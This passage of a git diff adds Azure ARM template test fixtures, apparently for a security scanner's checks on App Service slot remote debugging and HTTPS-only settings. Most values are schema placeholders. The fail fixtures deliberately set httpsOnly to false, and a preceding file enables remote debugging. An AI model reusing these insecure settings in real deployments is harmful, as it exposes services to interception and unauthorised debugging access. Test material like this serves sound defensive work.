+      "managedServiceIdentityId": "int",
+      "metadata": [
+        {
+          "name": "string",
+          "value": "string"
+        }
+      ],
+      "minimumElasticInstanceCount": "int",
+      "minTlsVersion": "string",
+      "netFrameworkVersion": "string",
+      "nodeVersion": "string",
+      "numberOfWorkers": "int",
+      "phpVersion": "string",
+      "powerShellVersion": "string",
+      "preWarmedInstanceCount": "int",
+      "publicNetworkAccess": "string",
+      "publishingUsername": "string",
+      "push": {
+        "kind": "string",
+        "properties": {
+          "dynamicTagsJson": "string",
+          "isPushEnabled": "bool",
+          "tagsRequiringAuth": "string",
+          "tagWhitelistJson": "string"
+        }
+      },
+      "pythonVersion": "string",
+      "remoteDebuggingEnabled": true,
+      "remoteDebuggingVersion": "string",
+      "requestTracingEnabled": "bool",
+      "requestTracingExpirationTime": "string",
+      "scmIpSecurityRestrictions": [
+        {
+          "action": "string",
+          "description": "string",
+          "headers": {},
+          "ipAddress": "string",
+          "name": "string",
+          "priority": "int",
+          "subnetMask": "string",
+          "subnetTrafficTag": "int",
+          "tag": "string",
+          "vnetSubnetResourceId": "string",
+          "vnetTrafficTag": "int"
+        }
+      ],
+      "scmIpSecurityRestrictionsDefaultAction": "string",
+      "scmIpSecurityRestrictionsUseMain": "bool",
+      "scmMinTlsVersion": "string",
+      "scmType": "string",
+      "tracingOptions": "string",
+      "use32BitWorkerProcess": "bool",
+      "virtualApplications": [
+        {
+          "physicalPath": "string",
+          "preloadEnabled": "bool",
+          "virtualDirectories": [
+            {
+              "physicalPath": "string",
+              "virtualPath": "string"
+            }
+          ],
+          "virtualPath": "string"
+        }
+      ],
+      "vnetName": "string",
+      "vnetPrivatePortsCount": "int",
+      "vnetRouteAllEnabled": "bool",
+      "websiteTimeZone": "string",
+      "webSocketsEnabled": "bool",
+      "windowsFxVersion": "string",
+      "xManagedServiceIdentityId": "int"
+    },
+    "storageAccountRequired": "bool",
+    "virtualNetworkSubnetId": "string",
+    "vnetContentShareEnabled": "bool",
+    "vnetImagePullEnabled": "bool",
+    "vnetRouteAllEnabled": "bool"
+  }
+}
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass.json b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass.json
new file mode 100644
index 00000000000..4b61687f174
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "pass",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "is try string to app service disallow cors"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": false,
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass2.json b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass2.json
new file mode 100644
index 00000000000..370ece10d24
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSlotDebugDisabled/pass2.json
@@ -0,0 +1,249 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+  "type": "Microsoft.Web/sites/slots",
+  "apiVersion": "2022-09-01",
+  "name": "pass2",
+  "location": "string",
+  "tags": {
+    "tagName1": "tagValue1",
+    "tagName2": "tagValue2"
+  },
+  "kind": "string",
+  "extendedLocation": {
+    "name": "string"
+  },
+  "properties": {
+    "clientAffinityEnabled": "bool",
+    "cloningInfo": {
+      "appSettingsOverrides": {},
+      "cloneCustomHostNames": "bool",
+      "cloneSourceControl": "bool",
+      "configureLoadBalancing": "bool",
+      "correlationId": "string",
+      "hostingEnvironment": "string",
+      "overwrite": "bool",
+      "sourceWebAppId": "string",
+      "sourceWebAppLocation": "string",
+      "trafficManagerProfileId": "string",
+      "trafficManagerProfileName": "string"
+    },
+    "containerSize": "int",
+    "customDomainVerificationId": "string",
+    "dailyMemoryTimeQuota": "int",
+    "enabled": "bool",
+    "hostingEnvironmentProfile": {
+      "id": "string"
+    },
+    "hostNamesDisabled": "bool",
+    "httpsOnly": "bool",
+    "hyperV": "bool",
+    "isXenon": "bool",
+    "serverFarmId": "string",
+    "siteConfig": {
+      "acrUseManagedIdentityCreds": "bool",
+      "acrUserManagedIdentityID": "string",
+      "alwaysOn": "bool",
+      "apiDefinition": {
+        "url": "string"
+      },
+      "apiManagementConfig": {
+        "id": "string"
+      },
+      "appCommandLine": "string",
+      "appSettings": [
+        {
+          "name": "string",
+          "value": "string"
+        }
+      ],
+      "autoHealEnabled": "bool",
+      "autoHealRules": {
+        "actions": {
+          "actionType": "string",
+          "customAction": {
+            "exe": "string",
+            "parameters": "string"
+          },
+          "minProcessExecutionTime": "string"
+        }
+      },
+      "autoSwapSlotName": "string",
+      "azureStorageAccounts": {},
+      "connectionStrings": [
+        {
+          "connectionString": "string",
+          "name": "string",
+          "type": "string"
+        }
+      ],
+      "cors": {
+        "allowedOrigins": [ "string" ],
+        "supportCredentials": "bool"
+      },
+      "defaultDocuments": [ "string" ],
+      "detailedErrorLoggingEnabled": "bool",
+      "documentRoot": "string",
+      "elasticWebAppScaleLimit": "int",
+      "experiments": {
+        "rampUpRules": [
+          {
+            "actionHostName": "string",
+            "changeDecisionCallbackUrl": "string",
+            "changeIntervalInMinutes": "int",
+            "changeStep": "int",
+            "maxReroutePercentage": "int",
+            "minReroutePercentage": "int",
+            "name": "string",
+            "reroutePercentage": "int"
+          }
+        ]
+      },
+      "ftpsState": "string",
+      "functionAppScaleLimit": "int",
+      "functionsRuntimeScaleMonitoringEnabled": "bool",
+      "handlerMappings": [
+        {
+          "arguments": "string",
+          "extension": "string",
+          "scriptProcessor": "string"
+        }
+      ],
+      "healthCheckPath": "string",
+      "http20Enabled": "bool",
+      "httpLoggingEnabled": "bool",
+      "ipSecurityRestrictions": [
+        {
+          "action": "string",
+          "description": "string",
+          "headers": {},
+          "ipAddress": "string",
+          "name": "string",
+          "priority": "int",
+          "subnetMask": "string",
+          "subnetTrafficTag": "int",
+          "tag": "string",
+          "vnetSubnetResourceId": "string",
+          "vnetTrafficTag": "int"
+        }
+      ],
+      "ipSecurityRestrictionsDefaultAction": "string",
+      "javaContainer": "string",
+      "javaContainerVersion": "string",
+      "javaVersion": "string",
+      "keyVaultReferenceIdentity": "string",
+      "limits": {
+        "maxDiskSizeInMb": "int",
+        "maxMemoryInMb": "int",
+        "maxPercentageCpu": "int"
+      },
+      "linuxFxVersion": "string",
+      "loadBalancing": "string",
+      "localMySqlEnabled": "bool",
+      "logsDirectorySizeLimit": "int",
+      "managedPipelineMode": "string",
+      "managedServiceIdentityId": "int",
+      "metadata": [
+        {
+          "name": "string",
+          "value": "string"
+        }
+      ],
+      "minimumElasticInstanceCount": "int",
+      "minTlsVersion": "string",
+      "netFrameworkVersion": "string",
+      "nodeVersion": "string",
+      "numberOfWorkers": "int",
+      "phpVersion": "string",
+      "powerShellVersion": "string",
+      "preWarmedInstanceCount": "int",
+      "publicNetworkAccess": "string",
+      "publishingUsername": "string",
+      "push": {
+        "kind": "string",
+        "properties": {
+          "dynamicTagsJson": "string",
+          "isPushEnabled": "bool",
+          "tagsRequiringAuth": "string",
+          "tagWhitelistJson": "string"
+        }
+      },
+      "pythonVersion": "string",
+      "remoteDebuggingVersion": "string",
+      "requestTracingEnabled": "bool",
+      "requestTracingExpirationTime": "string",
+      "scmIpSecurityRestrictions": [
+        {
+          "action": "string",
+          "description": "string",
+          "headers": {},
+          "ipAddress": "string",
+          "name": "string",
+          "priority": "int",
+          "subnetMask": "string",
+          "subnetTrafficTag": "int",
+          "tag": "string",
+          "vnetSubnetResourceId": "string",
+          "vnetTrafficTag": "int"
+        }
+      ],
+      "scmIpSecurityRestrictionsDefaultAction": "string",
+      "scmIpSecurityRestrictionsUseMain": "bool",
+      "scmMinTlsVersion": "string",
+      "scmType": "string",
+      "tracingOptions": "string",
+      "use32BitWorkerProcess": "bool",
+      "virtualApplications": [
+        {
+          "physicalPath": "string",
+          "preloadEnabled": "bool",
+          "virtualDirectories": [
+            {
+              "physicalPath": "string",
+              "virtualPath": "string"
+            }
+          ],
+          "virtualPath": "string"
+        }
+      ],
+      "vnetName": "string",
+      "vnetPrivatePortsCount": "int",
+      "vnetRouteAllEnabled": "bool",
+      "websiteTimeZone": "string",
+      "webSocketsEnabled": "bool",
+      "windowsFxVersion": "string",
+      "xManagedServiceIdentityId": "int"
+    },
+    "storageAccountRequired": "bool",
+    "virtualNetworkSubnetId": "string",
+    "vnetContentShareEnabled": "bool",
+    "vnetImagePullEnabled": "bool",
+    "vnetRouteAllEnabled": "bool"
+  }
+}
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail.json b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail.json
new file mode 100644
index 00000000000..ec212ee3032
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "fail",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": false,
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "is try string to app service disallow cors"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": false,
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail2.json b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail2.json
new file mode 100644
index 00000000000..ef06349ab79
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/fail2.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-09-01",
+      "name": "fail2",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": false,
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
